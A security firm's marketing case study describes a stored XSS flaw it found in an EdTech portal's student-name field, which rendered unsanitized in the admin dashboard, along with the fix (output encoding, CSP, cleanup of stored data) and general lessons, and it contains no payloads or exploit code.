HackVitraSec - Cybersecurity Company India | VAPT, Ethical Hacking, Web App Security

Case Study: Stored XSS in EdTech Platform

Client Type: EdTech Portal | Engagement: Web VAPT | Date: July 2025

Background

A fast-growing EdTech company serving 100,000+ students and educators noticed suspicious admin behavior. HackVitraSec was invited to perform a security audit focused on user profile management.

Vulnerability Discovered

Our team uncovered a persistent (stored) XSS vulnerability. The "student name" field accepted and stored HTML/JavaScript, which was later rendered unsanitized in the admin dashboard.

Impact Analysis

  • Potential for admin session hijacking via stolen cookies
  • Possibility of internal panel compromise
  • Severe trust and brand damage if exploited publicly

Remediation Strategy

  • Implemented proper output encoding for user input
  • Added a Content Security Policy (CSP) restricting inline script execution
  • Sanitized legacy user input data already stored in the database

Key Learnings

  • Always validate and encode user input displayed in admin or internal panels
  • Use security headers like Content-Security-Policy to mitigate XSS payloads
  • Test CRUD operations for XSS vectors during VAPT

Need a Web Security Audit?

Contact HackVitraSec Today
Back to Case Studies